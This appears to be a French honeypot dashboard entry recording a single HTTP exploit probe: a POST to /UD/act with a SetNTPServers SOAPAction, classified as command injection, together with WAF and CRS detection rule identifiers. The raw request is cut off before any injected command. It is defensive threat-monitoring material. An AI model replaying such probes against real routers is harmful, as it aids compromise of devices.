Profil de menace
Activité suspecte — risque 89/100 (Critique) — MITRE TA0001 — confiance 95 % — via HTTP
Activité suspecte — risque 89/100 (Critique) — MITRE TA0001 — confiance 95 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Injection commande dans la requête · confiance 95%
Confiance 95 % — Score WAF 100 · 11 tag(s) WAF
ASN 17816 · 27.40.0.0/13 · APNIC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 1 événements sur la période pour cette IP.
Même FAI China Unicom IP network China169 Guangdong province — corrélation indicative.
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
1 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
1 événement(s) — page 1/1
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 7574 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:7574 · (tentative d'exploit) · → /UD/act | Élevée | Critique · 89 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /UD/act UA Hello, world
Émulateur
HTTP
WAF
73
Recommandation
Bloquer (recommandé)
Tags
Cible HTTP
POST
/UD/act
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
7574
Chemin / cible
/UD/act
Service
HTTP
Pourquoi cette classification : Injection commande dans la requête · confiance 95%
Confiance classification
95%
Risque capteur
Critique
· 89
Confiance : Confiance 95 % — Motif catalogue confirmé · 11 tag(s) WAF
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932190
CRS 932200
CRS 932205
CRS 932206
CRS 941130
SSRF Localhost SSRF
LFI Double-dot bypass
Ligne de requête
User-Agent
Hello, world
Règles WAF
sqli-19
lfi-14
rce-0
rce-2
ssrf-2
ssrf-3
nosqli-3
cache-poison-host
ssrf-private-cidr
dns-rebind
Payload (extrait)
POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7574 User-Agent: Hello, world SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServe
Requête brute (extrait)
POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7574 User-Agent: Hello, world SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 640 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoa |
|||||||